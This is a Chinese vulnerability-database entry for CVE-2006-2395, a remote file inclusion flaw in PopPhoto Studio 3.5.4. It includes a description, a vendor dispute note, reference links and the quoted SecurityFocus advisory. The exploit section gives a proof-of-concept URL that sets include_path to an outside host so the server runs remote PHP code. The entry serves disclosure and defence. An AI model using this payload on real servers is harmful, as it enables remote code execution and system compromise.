PopSoft Digital PopPhoto Studio popp.config.loader.inc.php PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110277 漏洞类型 代码注入
发布时间 2006-05-15 更新时间 2006-06-21
CVE编号 CVE-2006-2395 CNNVD-ID CNNVD-200605-280
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/27868
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200605-280
|漏洞详情
PopSoftDigitalPopPhotoStudio3.5.4及之前版本的resources/includes/popp.config.loader.inc.php中存在PHP远程文件包含漏洞。远程攻击者可以借助include_path参数(cfg['popphoto_base_path']变量)中的URL,执行任意PHP代码。注意:Pixaria已通知CVE"PopPhoto并非Pixaria的产品。它是PopSoftDigital的产品,只不过由Pixaria提供免费的主机服务...所述漏洞已经由以前的厂商打了补丁,所有的以前用户已经收到了该更新程序。"
|漏洞EXP
source: http://www.securityfocus.com/bid/17970/info

Pixaria PopPhoto is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

This issue affects PopPhoto 3.5.4. Other versions may be affected as well.

http://www.example.com/[path]/resources/includes/popp.config.loader.inc.php?
include_path=http://unsecured-systems.com/forum/
|参考资料

来源:XF
名称:popphoto-poppconfigloader-file-include(26449)
链接:http://xforce.iss.net/xforce/xfdb/26449
来源:BID
名称:17970
链接:http://www.securityfocus.com/bid/17970
来源:www.pixaria.com
链接:http://www.pixaria.com/news/article/35/
来源:OSVDB
名称:25524
链接:http://www.osvdb.org/25524
来源:VUPEN
名称:ADV-2006-1792
链接:http://www.frsirt.com/english/advisories/2006/1792
来源:VIM
名称:20060615Disputedvulnerability:Pixaria,PopPhoto(fwd)
链接:http://www.attrition.org/pipermail/vim/2006-June/000869.html
来源:SECTRACK
名称:1016092
链接:http://securitytracker.com/id?1016092
来源:SECUNIA
名称:20087
链接:http://secunia.com/advisories/20087
来源:MISC
链接:http://pridels0.blogspot.com/2006/05/popphoto-remote-file-inclusion-vuln.html